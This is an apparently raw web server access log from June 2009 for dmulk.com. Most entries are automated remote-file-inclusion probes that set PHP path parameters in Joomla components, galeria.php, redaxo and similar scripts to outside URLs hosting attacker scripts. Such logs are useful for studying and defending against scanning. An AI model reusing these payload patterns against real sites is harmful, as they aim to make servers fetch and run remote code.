64.157.4.42 - - [21/Jun/2009:10:20:51 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
213.189.2.38 - - [21/Jun/2009:10:21:05 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://rsh.kiev.ua/images/idfx1.txt???? HTTP/1.1" 200 21007 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [21/Jun/2009:10:21:46 -0700] "HEAD /blog/wp-cron.php?check=0e2d9f8f249ca15a02717d213606e9a2 HTTP/1.0" 200 0 "-" "WordPress/2.7.1" "dmulk.com"
64.157.4.41 - - [21/Jun/2009:10:21:46 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
208.80.195.41 - - [21/Jun/2009:10:22:01 -0700] "GET / HTTP/1.0" 200 20906 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.0.3705; .NET CLR 1.1.4322)" "dmulk.com"
88.191.89.138 - - [21/Jun/2009:10:22:10 -0700] "GET /logs/access_080111.log%20%20//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.191.89.138 - - [21/Jun/2009:10:22:10 -0700] "GET /logs/access_080120.log%20%20//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.139.67.116 - - [21/Jun/2009:10:22:52 -0700] "GET /logs/access_080223.log/errors.php?error=http://www.portalsana.com.br/SiJi?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.139.67.116 - - [21/Jun/2009:10:22:53 -0700] "GET /logs/access_080207.log/errors.php?error=http://www.portalsana.com.br/SiJi?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.53.29.34 - - [21/Jun/2009:10:23:05 -0700] "GET /logs/access_090211.log HTTP/1.1" 200 2801261 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1)LookThereItIs.Com/20061010 Firefox/2.0" "www.dmulk.com"
74.53.29.34 - - [21/Jun/2009:10:23:21 -0700] "GET /logs/access_090504.log HTTP/1.1" 200 3972873 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1)LookThereItIs.Com/20061010 Firefox/2.0" "www.dmulk.com"
216.139.67.116 - - [21/Jun/2009:10:23:33 -0700] "GET /logs/access_080726.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.portalsana.com.br/SiJi?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.189.2.38 - - [21/Jun/2009:10:23:46 -0700] "GET /logs/access_090518.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://rsh.kiev.ua/images/idfx1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.139.67.116 - - [21/Jun/2009:10:24:36 -0700] "GET /logs/access_090120.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.portalsana.com.br/SiJi?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.139.67.116 - - [21/Jun/2009:10:24:47 -0700] "GET /logs/access_081007.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.portalsana.com.br/SiJi?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.23.158.226 - - [21/Jun/2009:10:25:12 -0700] "GET /logs/access_080218.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
65.23.158.226 - - [21/Jun/2009:10:25:12 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
65.23.158.226 - - [21/Jun/2009:10:25:12 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
213.189.2.38 - - [21/Jun/2009:10:25:55 -0700] "GET /logs/access_090503.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://rsh.kiev.ua/images/idfx1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [21/Jun/2009:10:25:58 -0700] "GET /logs/access_080716.log/?seite=http://www.freewebtown.com/fucku4/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.23.158.226 - - [21/Jun/2009:10:26:00 -0700] "GET /logs/access_080508.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
83.98.209.71 - - [21/Jun/2009:10:26:10 -0700] "GET /redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.98.209.71 - - [21/Jun/2009:10:26:10 -0700] "GET /logs//redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.98.209.71 - - [21/Jun/2009:10:26:10 -0700] "GET /logs/access_080616.log//redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.98.209.71 - - [21/Jun/2009:10:26:26 -0700] "GET /logs/access_080121.log//redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:10:27:03 -0700] "GET /components/com_joomlaboard/file_upload.php?sbp=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:10:27:03 -0700] "GET /logs/access_090328.log%20%20//components/com_joomlaboard/file_upload.php?sbp=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:10:27:03 -0700] "GET /logs//components/com_joomlaboard/file_upload.php?sbp=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.234.21.178 - - [21/Jun/2009:10:27:05 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
218.234.21.178 - - [21/Jun/2009:10:27:05 -0700] "GET /logs/access_080218.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
218.234.21.178 - - [21/Jun/2009:10:27:05 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:10:27:10 -0700] "GET /logs//components/com_joomlaboard/file_upload.php?sbp=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:10:27:10 -0700] "GET /components/com_joomlaboard/file_upload.php?sbp=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:10:27:10 -0700] "GET /logs/access_090328.log%20%20//components/com_joomlaboard/file_upload.php?sbp=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:10:27:15 -0700] "GET /components/com_joomlaboard/file_upload.php?sbp=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:10:27:15 -0700] "GET /logs/access_090328.log%20%20//components/com_joomlaboard/file_upload.php?sbp=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:10:27:15 -0700] "GET /logs//components/com_joomlaboard/file_upload.php?sbp=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [21/Jun/2009:10:28:16 -0700] "GET /logs/access_071111.log%20%20/?seite=http://www.freewebtown.com/fucku4/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:10:28:18 -0700] "GET /logs/access_090408.log%20%20//components/com_joomlaboard/file_upload.php?sbp=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:10:28:21 -0700] "GET /logs/access_090408.log%20%20//components/com_joomlaboard/file_upload.php?sbp=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:10:28:23 -0700] "GET /logs/access_090408.log%20%20//components/com_joomlaboard/file_upload.php?sbp=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.48.127.79 - - [21/Jun/2009:10:28:26 -0700] "GET /logs/access_090226.log%20%20/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://about-dogs.info/hard/fx2id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.48.127.79 - - [21/Jun/2009:10:28:26 -0700] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://about-dogs.info/hard/fx2id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.48.127.79 - - [21/Jun/2009:10:28:26 -0700] "GET /logs/access_081117.log%20%20/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://about-dogs.info/hard/fx2id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.23.158.226 - - [21/Jun/2009:10:28:27 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
65.23.158.226 - - [21/Jun/2009:10:28:27 -0700] "GET /logs/access_080218.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
64.157.4.43 - - [21/Jun/2009:10:28:27 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
65.23.158.226 - - [21/Jun/2009:10:28:28 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
190.144.44.36 - - [21/Jun/2009:10:28:31 -0700] "GET /logs/access_090228.log%20%20/?seite=http://www.freewebtown.com/fucku4/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.139.67.116 - - [21/Jun/2009:10:28:40 -0700] "GET /logs//galeria.php?start=0&kategoria=http://www.portalsana.com.br/SiJi?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.139.67.116 - - [21/Jun/2009:10:28:40 -0700] "GET /logs/access_081213.log//galeria.php?start=0&kategoria=http://www.portalsana.com.br/SiJi?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.48.127.79 - - [21/Jun/2009:10:28:42 -0700] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://about-dogs.info/hard/fx2id.txt?? HTTP/1.1" 200 20928 "-" "Mozilla/5.0" "www.dmulk.com"
216.139.67.116 - - [21/Jun/2009:10:28:43 -0700] "GET /galeria.php?start=0&kategoria=http://www.portalsana.com.br/SiJi?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.139.67.116 - - [21/Jun/2009:10:28:49 -0700] "GET /logs/access_081231.log//galeria.php?start=0&kategoria=http://www.portalsana.com.br/SiJi?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
63.147.72.145 - - [21/Jun/2009:10:28:50 -0700] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://about-dogs.info/hard/fx2id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
63.147.72.145 - - [21/Jun/2009:10:28:50 -0700] "GET /logs/access_090226.log%20%20/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://about-dogs.info/hard/fx2id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [21/Jun/2009:10:28:51 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
63.147.72.145 - - [21/Jun/2009:10:28:52 -0700] "GET /logs/access_081117.log%20%20/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://about-dogs.info/hard/fx2id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.30.78.238 - - [21/Jun/2009:10:28:55 -0700] "GET /logs/access_090610.log HTTP/1.0" 200 3021616 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
218.234.21.178 - - [21/Jun/2009:10:28:57 -0700] "GET /logs/access_080218.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
218.234.21.178 - - [21/Jun/2009:10:28:57 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
218.234.21.178 - - [21/Jun/2009:10:28:57 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
92.48.127.79 - - [21/Jun/2009:10:29:07 -0700] "GET /logs/access_090226.log/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://about-dogs.info/hard/fx2id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.48.127.79 - - [21/Jun/2009:10:29:07 -0700] "GET /logs/access_081117.log/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://about-dogs.info/hard/fx2id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
63.147.72.145 - - [21/Jun/2009:10:29:08 -0700] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://about-dogs.info/hard/fx2id.txt?? HTTP/1.1" 200 20928 "-" "Mozilla/5.0" "www.dmulk.com"
218.234.21.178 - - [21/Jun/2009:10:29:09 -0700] "GET /logs/access_080508.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
88.191.89.138 - - [21/Jun/2009:10:29:13 -0700] "GET /logs//components/com_joomlaboard/file_upload.php?sbp=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.191.89.138 - - [21/Jun/2009:10:29:13 -0700] "GET /components/com_joomlaboard/file_upload.php?sbp=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.191.89.138 - - [21/Jun/2009:10:29:13 -0700] "GET /logs/access_090328.log%20%20//components/com_joomlaboard/file_upload.php?sbp=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.51.133.202 - - [21/Jun/2009:10:29:15 -0700] "GET /logs/access_081012.log//index.php?DOCUMENT_ROOT=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.51.133.202 - - [21/Jun/2009:10:29:15 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [21/Jun/2009:10:29:16 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
65.23.158.226 - - [21/Jun/2009:10:29:23 -0700] "GET /logs/access_080508.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
209.51.133.202 - - [21/Jun/2009:10:29:30 -0700] "GET /index.php?DOCUMENT_ROOT=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 200 20885 "-" "Mozilla/5.0" "www.dmulk.com"
200.54.154.10 - - [21/Jun/2009:10:29:31 -0700] "GET /logs//browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.54.154.10 - - [21/Jun/2009:10:29:31 -0700] "GET /logs/access_081021.log//browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.54.154.10 - - [21/Jun/2009:10:29:31 -0700] "GET /browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.34.78.110 - - [21/Jun/2009:10:29:34 -0700] "GET /logs//galeria.php?start=0&kategoria=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.34.78.110 - - [21/Jun/2009:10:29:34 -0700] "GET /logs/access_081121.log//galeria.php?start=0&kategoria=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.34.78.110 - - [21/Jun/2009:10:29:34 -0700] "GET /galeria.php?start=0&kategoria=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.51.133.202 - - [21/Jun/2009:10:29:36 -0700] "GET /logs/access_080723.log%20%20//index.php?DOCUMENT_ROOT=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.51.133.202 - - [21/Jun/2009:10:29:36 -0700] "GET /logs/access_080719.log%20%20//index.php?DOCUMENT_ROOT=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.54.154.10 - - [21/Jun/2009:10:29:42 -0700] "GET /logs/access_081007.log%20%20//browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.54.154.10 - - [21/Jun/2009:10:29:43 -0700] "GET /logs/access_081021.log%20%20//browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.34.78.110 - - [21/Jun/2009:10:29:43 -0700] "GET /logs/access_081213.log//galeria.php?start=0&kategoria=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.34.78.110 - - [21/Jun/2009:10:29:44 -0700] "GET /logs/access_081231.log//galeria.php?start=0&kategoria=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.162.115.67 - - [21/Jun/2009:10:29:49 -0700] "GET /logs/access_081213.log//galeria.php?start=0&kategoria=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.162.115.67 - - [21/Jun/2009:10:29:49 -0700] "GET /logs/access_081231.log//galeria.php?start=0&kategoria=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.162.115.67 - - [21/Jun/2009:10:29:49 -0700] "GET /logs/access_081121.log//galeria.php?start=0&kategoria=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.162.115.67 - - [21/Jun/2009:10:29:49 -0700] "GET /galeria.php?start=0&kategoria=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.162.115.67 - - [21/Jun/2009:10:29:49 -0700] "GET /logs//galeria.php?start=0&kategoria=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:10:30:14 -0700] "GET /logs//components/com_joomlaboard/file_upload.php?sbp=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:10:30:14 -0700] "GET /components/com_joomlaboard/file_upload.php?sbp=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:10:30:14 -0700] "GET /logs/access_080507.log%20%20//components/com_joomlaboard/file_upload.php?sbp=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.191.89.138 - - [21/Jun/2009:10:30:16 -0700] "GET /logs/access_090408.log%20%20//components/com_joomlaboard/file_upload.php?sbp=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:10:30:22 -0700] "GET /components/com_joomlaboard/file_upload.php?sbp=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:10:30:22 -0700] "GET /logs//components/com_joomlaboard/file_upload.php?sbp=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:10:30:22 -0700] "GET /logs/access_080507.log%20%20//components/com_joomlaboard/file_upload.php?sbp=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.139.67.116 - - [21/Jun/2009:10:30:36 -0700] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.portalsana.com.br/SiJi?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.139.67.116 - - [21/Jun/2009:10:30:36 -0700] "GET /logs/access_090130.log%20%20/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.portalsana.com.br/SiJi?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.139.67.116 - - [21/Jun/2009:10:30:37 -0700] "GET /logs/access_090124.log%20%20/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.portalsana.com.br/SiJi?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.40.150.211 - - [21/Jun/2009:10:30:38 -0700] "GET /browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.40.150.211 - - [21/Jun/2009:10:30:38 -0700] "GET /logs//browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.40.150.211 - - [21/Jun/2009:10:30:38 -0700] "GET /logs/access_081021.log//browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.162.115.67 - - [21/Jun/2009:10:30:39 -0700] "GET /logs/access_081124.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:10:30:39 -0700] "GET /components/com_joomlaboard/file_upload.php?sbp=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:10:30:39 -0700] "GET /logs//components/com_joomlaboard/file_upload.php?sbp=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:10:30:39 -0700] "GET /logs/access_080507.log%20%20//components/com_joomlaboard/file_upload.php?sbp=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
